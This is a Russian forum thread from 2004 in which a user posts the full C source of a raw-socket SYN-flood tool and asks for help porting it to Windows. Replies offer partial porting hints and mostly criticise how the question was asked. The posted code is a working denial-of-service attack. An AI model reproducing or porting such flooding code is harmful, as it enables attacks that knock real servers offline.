Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | | | | |
Я знаю, почему никто не захотел 16.03.04 18:01 Число просмотров: 1355
Автор: amirul <Serge> Статус: The Elderman
|
Ты забыл написать: "Живо, мля!!!" :-)
Ну не захотел никто переписывать для тебя этот код. В MSDN-е про сокеты все прекрасно расписано. Я там даже про Nagle алгоритм и прочие прелести TCP/IP понаходил.
Ну не ответили и все. Зачем обижаться-то. А тем более высказывать сомнения в компетенции. Думаю если ты предложишь мне или тому же Ktirf-у пару зеленых президентов. Короче. Все сказано у Реймонда: http://www.bugtraq.ru/forum/faq/general/smart-questions.html
Если ты не показал, что ты и сам работал над этим вопросом, а просто придешь и скажешь: напишите мне и побыстрее, тебя скорее всего проигнорируют
|
<programming>
|
Помогите портировать код из Unix в Windows 12.03.04 22:28 [leo, Ktirf, amirul, vaborg]
Автор: choor Статус: Elderman
|
Продолжаю изучать Си. Вот помогите разобраться как этот код:
/*
*
* synflood.c - description:
* programm: SYN-Flooder
* version: 0.1
* author: VIsir (visir@p0is0n.net)
*
* (c)Net Poison [www.p0is0n.net] Network Parasites
*
*/
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netinet/tcp.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in sin;
struct tcphdr tcph;
if(argc != 3) {
printf("Usage: %s <ip> <port>\n", argv[0]);
return 0;
}
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(atoi(argv[2]));
if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
perror("socket()");
return 0;
}
bzero(&tcph, sizeof(tcph));
#ifdef_linux_ tcph.dest = sin.sin_port;
tcph.doff = sizeof(tcph) >> 2;
tcph.syn = 1;
tcph.window = htons(65535);
#else
tcph.th_dport = sin.sin_port;
tcph.th_off = sizeof(tcph) >> 2;
tcph.th_flags = TH_SYN;
tcph.th_win = htons(65535);
#endif
printf("Flooding %s:%d\n", inet_ntoa(sin.sin_addr),
ntohs(sin.sin_port));
while(1) {
int sport, seq;
#ifdef_linux_ tcph.source = htons(sport);
tcph.seq = htonl(seq);
#else
tcph.th_sport = htons(sport);
tcph.th_seq = htonl(seq);
#endif
seq += 31337;
sport -= 13572;
if(sendto(sock, &tcph, sizeof(tcph), 0,
(struct sockaddr*)&sin, sizeof(sin)) == -1) {
perror("sendto()");
return 0;
}
printf(".");
fflush(stdout);
}
close(sock);
}
---
Перенести в Windows.
Примного благодарен, если ещё и коментарии будут :)
|
|
Человек, писавший эту программу сказал 16.03.04 07:15
Автор: choor Статус: Elderman
|
Изменить инклуды на:
#define WIN32_LEAN_AND_BEAM
#include<windows.h>
#include<winsock.h>
И добавить функцию:
int WSAStartup (
WORD wVersionRequested,
LPWSADATA lpWSAData
);
|
| |
Мало и не совсем то. 16.03.04 15:52
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
> Изменить инклуды на: > > #define WIN32_LEAN_AND_BEAM Гы, он WIN32_LEAN_AND_MEAN, вообще-то :) Вообще говоря, по фигу. Этот макрос всего лишь отключает редко используемый код в библиотеках, чтобы компилятор его зря не жевал. Точно можно сказать, что простенький клиент на сокетах этот код не использует, так что да, можно поставить :) Возможно, оно будет у тебя компиляться на пару десятых секунды быстрее :)
> #include<windows.h> > #include<winsock.h> > > И добавить функцию: > > int WSAStartup ( > WORD wVersionRequested, > LPWSADATA lpWSAData > );
Это не все. Я, конечно, понимаю, что на виндах с сокетами через int работать - это круто, но я бы все-таки тип SOCKET использовал. И еще некоторое количество таких же фишек, в частности, с проверками ошибок.
|
| |
Все понятно ктоме одного -- какова мораль? :) 16.03.04 11:26
Автор: vaborg <Israel Vaborg> Статус: Elderman
|
|
| | |
:) 16.03.04 14:36
Автор: choor Статус: Elderman
|
Получилось, что никто не знает, как быстро и комфортно перенести этот код :) кроме того кто писал этот код %)
Программисты блин %))
|
| | | |
Не. Никто не захотел помочь. 16.03.04 16:00
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
> Получилось, что никто не знает, как быстро и комфортно > перенести этот код :) кроме того кто писал этот код %) Ага, и даже он сказал не все.
> Программисты блин %)) Могу лишь ответить - учащийся C блин %-)
На Реймонда ссылку дать?
|
| | | | |
Давай :) 16.03.04 18:57
Автор: choor Статус: Elderman
|
|
| | | | | |
Она, в общем-то, вверху страницы все время висит. Не обижайся, если что. 16.03.04 19:48
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
Как правильно задавать вопросы
|
| | | | | | |
О! и я не сразу въехал :))))))) именна это и нужно :) 16.03.04 20:53
Автор: vaborg <Israel Vaborg> Статус: Elderman
|
|
| | | |
мая ни согласная!!! :) 16.03.04 15:36
Автор: vaborg <Israel Vaborg> Статус: Elderman
|
> Получилось, что никто не знает, как быстро и комфортно > перенести этот код :) кроме того кто писал этот код %) > Программисты блин %)) Люди смотрели с общих позиций на впорос,
никто и не собиралсяя запускать именно этот листинг :)
ты бы еще кусок ядра положил с вопросом как запустить под мастдаем :)))
|
| | | | |
Ну мне конкретно нужен был этот код :) 16.03.04 15:46
Автор: choor Статус: Elderman
|
|
| | | | | |
Я знаю, почему никто не захотел 16.03.04 18:01
Автор: amirul <Serge> Статус: The Elderman
|
Ты забыл написать: "Живо, мля!!!" :-)
Ну не захотел никто переписывать для тебя этот код. В MSDN-е про сокеты все прекрасно расписано. Я там даже про Nagle алгоритм и прочие прелести TCP/IP понаходил.
Ну не ответили и все. Зачем обижаться-то. А тем более высказывать сомнения в компетенции. Думаю если ты предложишь мне или тому же Ktirf-у пару зеленых президентов. Короче. Все сказано у Реймонда: http://www.bugtraq.ru/forum/faq/general/smart-questions.html
Если ты не показал, что ты и сам работал над этим вопросом, а просто придешь и скажешь: напишите мне и побыстрее, тебя скорее всего проигнорируют
|
| | | | | | |
Да я ни на кого не обиделся :) 16.03.04 18:17
Автор: choor Статус: Elderman Отредактировано 16.03.04 18:22 Количество правок: 1
|
Да я ни на кого не обиделся :)
Наоборот спасибо, что помогли :)
|
| | | | | | | |
мая опять ни согласная :))) 16.03.04 19:34
Автор: vaborg <Israel Vaborg> Статус: Elderman
|
читаем первый пост!!! :)
------помогите разобраться!!!! :)------------
каждый сказал все что знал по поводу портирования
а вот разбираться в нем надо было самому :)) вообщем
каков вопрос таков и ответ ничего тут удивительного :)))
|
|
Ну переводить твой код не буду ;), Вообще я не уверен что в... 15.03.04 12:52
Автор: Killer{R} <Dmitry> Статус: Elderman
|
Ну переводить твой код не буду ;), Вообще я не уверен что в виндах есть RAW_TCP, а вот RAW_IP имеется начиная с 2000х. Вот тебе ссылка. Все что там описано - работает ;)
http://pinegap.net/infosurge/infosurge-20.txt
|
|
Cygwin 15.03.04 11:53
Автор: vaborg <Israel Vaborg> Статус: Elderman
|
врятли кто то будет тебе переносить твой код :)
если надо запустить то субж может помочь
а вообще говоря портирование весчь нетривиальная
могу тока предложить придерживаться POSIXа :)) тогда по идее все запуститься без проблем :)
|
| |
пример 15.03.04 16:49
Автор: vaborg <Israel Vaborg> Статус: Elderman
|
нашел пример который может понять как и куда переносится
смотри исходники sylpheed для линуха и вин32
читай доку к ним и думай :)
|
|
Пожалуйста :) 13.03.04 23:25
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
Ну хорошо, давай я тебе перечислю места, которые нужно изменить. Я скорее всего что-то забуду. Тебе это поможет в изучении C?
Вот тебе кусок кода (через Яндекс найденный, между прочим), методом сравнения попробуй понять, что тебе нужно изменить. И почитай MSDN по работе с сокетами, если уж неохота в бумажные книжки лезть.
Заглянув по ссылке, ты поймешь, что комментарии к твоему вопросу писать - на брошюрку хватит. У Снейдера все по крайней мере систематично изложено.
|
|
Берешь Йона Снейдера и читаешь. 13.03.04 15:12
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
|
| |
Спасибо за очень конструктивный и позновательный ответ! 13.03.04 17:59
Автор: choor Статус: Elderman
|
|
|
|